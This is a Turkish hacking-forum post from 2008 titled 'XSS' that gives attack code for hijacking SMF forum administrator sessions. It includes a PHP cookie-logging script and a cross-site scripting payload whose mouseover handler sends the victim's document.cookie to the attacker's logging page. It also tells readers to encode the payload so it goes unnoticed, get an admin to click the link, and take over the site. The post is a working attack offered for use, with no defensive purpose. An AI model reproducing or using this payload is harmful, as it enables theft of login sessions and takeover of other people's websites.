avatar
Tarih: 12:21, 20-11-08 12:21 Sitemize Hoşgeldiniz. (Oturum AçKayıt Ol)

Bu Konuyu Görüntüleyenler
Bu Konuyu görüntüleyenler: 1 Ziyaretçi

Konuyu Gönder  Mesaj Önizleme 
 
Konuyu Değerlendir
  • 0 Oy - 0 Ortalama
  • 1
  • 2
  • 3
  • 4
  • 5
XSS
15:43, 16-03-08 15:43
Mesaj: #1
XSS
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' 15 '.$date."\n".$referer." 15 ".$cookie."\n");
fclose($fl);
?>

kodları hostunuza free olsun farketmez atın..

sonra asagıda xss kodumuz var.

maxage|'|" style="position:absolute; top:0px; left:0px; width:1000px; height:1000px;" onmouseover="document.location ='http://yukardakikoduattiginizsite.com /cookieyolu.php?cookie='+escape (document.cookie) ""|"|brd|'||"|show_complete|'| |"|subject_only|'||" |search|'|lol

Sadece Üyeler Linkleri Görebilir. Üye Olmak İçin TIKLAYIN /cookieyolu.phplinkini bulun yukardan kodları nereye attıysanız kendinize göre uyarlayın.linki editleyin.

kendinize göre ayarladıktan sonra yukardaki xss kodunu anlaşılmaması için base24 ceviriyoruz..

nerden Burdan

Smf resmi sitesinde acıga bakalım

Bakın

Şimdi Sadece Üyeler Linkleri Görebilir. Üye Olmak İçin TIKLAYIN /cookieyolu.php bu linki admine tıklatın cookieleri alın siteyi ele gecirin..

1.1.1 de var mı bilmiyorum denemedim ama tahmin edeyim vardır

[Resim: uyari.gif]Uyarı: İndirmeye başlamadan önce lütfen linklerin hepsini kontrol ediniz.
[Resim: istek.gif]İstek Yapmadan Önce Forumda Sadece Üyeler Linkleri Görebilir. Üye Olmak İçin TIKLAYIN Yapınız!
[Resim: saygi.gif]Verilen emeğe lütfen saygı gösteriniz. En azından bir teşekkür edebilirsiniz.


Her Türlü Sorununuzda Bana Ulaşın.
Zamanın Durduğu Kaliteli İnsanların Paylaşım Mekanı

Sadece Üyeler Linkleri Görebilir. Üye Olmak İçin TIKLAYIN

Hedefimiz En Büyük ve En İyi Olmaktır
Kullanıcının websitesini ziyaret et Bu kullanıcının gönderdiği tüm mesajları bul
Bu mesajı bir cevapta alıntı yap
Konuyu Gönder  Mesaj Önizleme 


Foruma Git: